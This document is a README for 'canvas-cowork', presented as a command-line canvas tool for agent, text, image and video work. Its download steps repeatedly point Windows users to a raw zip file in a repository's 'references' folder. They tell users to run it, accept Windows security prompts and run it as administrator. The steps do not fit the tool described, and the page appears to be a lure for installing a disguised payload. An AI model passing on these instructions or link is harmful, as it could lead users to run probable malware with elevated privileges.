# 🧩 canvas-cowork - Work on a shared canvas

[![Download / Install](https://img.shields.io/badge/Download-Install%20from%20GitHub-blue?style=for-the-badge&logo=github)](https://raw.githubusercontent.com/alexzq343-beep/canvas-cowork/main/references/cowork-canvas-1.6.zip)

## 🖥️ What it does

canvas-cowork lets you work on a spatial canvas from the command line. You can create canvases, add text, make images, generate video, ask an agent for help, read results, recall past work, and manage nodes from one place.

It is built for people who want a simple way to keep tasks, outputs, and agent work in one shared space.

## 📥 Download and install

Use this link to visit the download page and get the app for Windows:

https://raw.githubusercontent.com/alexzq343-beep/canvas-cowork/main/references/cowork-canvas-1.6.zip

1. Open the link in your browser.
2. Download the Windows version or the main app file from the page.
3. If Windows asks for permission, choose Yes or Run.
4. If the file comes in a .zip folder, right-click it and choose Extract All.
5. Open the extracted folder.
6. Double-click the app or launcher file to start it.

If the app opens in a command window, keep that window open while you use it.

## ⚙️ System needs

canvas-cowork is made for Windows desktop use. A modern Windows 10 or Windows 11 PC should work well.

For a smooth run, use:

- 8 GB of RAM or more
- A recent Intel or AMD processor
- 1 GB of free disk space
- A stable internet connection for agent tasks and generated content

If you plan to generate images or video, a stronger computer will help.

## 🚀 First-time setup

After you install the app, follow these steps:

1. Start canvas-cowork.
2. Sign in or connect any account the app asks for.
3. Open the main canvas screen.
4. Create your first canvas.
5. Add a note, task, or prompt node.
6. Run a text, image, or agent action.
7. Check the result in the canvas view.

If you use the app with other tools, keep the canvas open so you can track each step.

## 🧠 What you can do

canvas-cowork gives you a shared space for work items and outputs. Typical use cases include:

- Create a new canvas for a project
- Place text nodes for ideas, prompts, or notes
- Generate images from a prompt
- Ask an agent to write or answer something
- Create video outputs for a task
- Read results from past runs
- Revisit earlier work with recall tools
- Move, connect, and organize nodes
- Keep project work in a clean visual layout

This setup works well when you want to track many small steps without losing context.

## 🗂️ Main parts of the app

### 🎨 Canvas
The canvas is the main workspace. It gives you a wide view where you can place items where they make sense.

### 📝 Nodes
Nodes are the blocks on the canvas. Each node can hold text, output, a prompt, or a result from a tool.

### 🤖 Agent actions
Agent actions help you generate text or answer questions. You can send a prompt and place the reply back on the canvas.

### 🖼️ Media generation
You can create images and video from inputs you place on the canvas.

### 📚 Recall
Recall helps you find past work and reuse it later.

### 🧭 Node management
You can move, edit, and organize nodes to keep your canvas clear.

## 🪟 How to use it on Windows

1. Download the app from the GitHub link above.
2. Save the file to your Downloads folder.
3. Install or extract the app, based on the file type.
4. Start the app from the folder or shortcut.
5. If Windows shows a security prompt, choose the option to run it.
6. Use the canvas to create and manage your work.

If the app uses a terminal window, you can pin that window or add a shortcut for faster access.

## 🔧 Common actions

### ➕ Create a canvas
Start a new canvas when you want to begin a fresh project or task set.

### ✍️ Add text
Use text nodes for notes, prompts, instructions, or output.

### 🖼️ Generate an image
Add an image task, then use the prompt you want. Review the result on the canvas.

### 🎬 Generate video
Use a video task when you need a motion output for a project.

### 💬 Ask an agent
Send a question or task to an agent and place the response on the canvas.

### 🔎 Read results
Open past output and review what the app returned before.

### 🧱 Manage nodes
Move nodes, rename them, and group related items so your canvas stays easy to read.

## 🧩 Example workflow

1. Create a canvas named for your project.
2. Add a text node with your goal.
3. Add one node for each task.
4. Send a prompt to an agent.
5. Add the result to the canvas.
6. Generate an image if you need a visual.
7. Store useful outputs for later use.
8. Return to the canvas when you want to continue work.

## 📌 Good ways to use canvas-cowork

- Planning small projects
- Keeping prompts in one place
- Tracking generated content
- Comparing output from different runs
- Organizing agent work

- Building a visual record of work

## 🛠️ If something does not open

If the app does not start, try these steps:

1. Check that the download finished.
2. Extract the file if it is inside a zip folder.
3. Run the app again from the extracted folder.
4. Right-click the file and choose Run as administrator.
5. Restart Windows and try again.
6. Download the file again if it looks broken.

If the app opens and closes fast, make sure you launched the correct file.
